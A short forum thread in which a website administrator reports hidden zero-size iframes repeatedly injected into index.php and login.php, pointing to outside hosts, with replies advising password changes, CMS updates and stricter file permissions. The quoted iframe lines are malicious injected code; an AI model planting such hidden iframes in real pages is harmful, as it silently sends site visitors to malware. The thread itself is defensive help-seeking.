hi… i am the web admin from site
http://ppi-koeln.de/

recently i found that an iframe was added to the bottom of index.php and login.php
before it was this

<iframe src="http://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

i deleted it,
and after few days, this iframe was there again…
i deleted it, and i send email to the owner of individualpeople.biz
got no response…

oh yeah, and some friends of mine that use windows tell that when they open the site, antivirus tell that there’s a virus

and now this code is added

<iframe src="http://fifa-09.cn/1/index.php" width="0" height="0" style="display:none"></iframe>

i havent delete this one, you can see and check the source…

after a few search, i found that index.php and login.php in subfolder /m/ are changed too,
and that frame was also added to the bottom of the file…

please help…
i think someone use bot or something,because it only affects index.php and login.php
it looks like an automated process…

sorry for my bad english

If you don’t know what got hack then the best thing to do is to wipe out your site and start over again and this time be more careful how you set up your site and permission should be strict.

Seems like your content management system is outdated, maybe it has some vulnerability. I can suggest you to change FTP password and update CSM to the latest version. Also make sure you do not have any files or folders CHMOD’ed to 777

hi i’ve set different password for account,ftp and mysql…

its doing ok now…
thanks…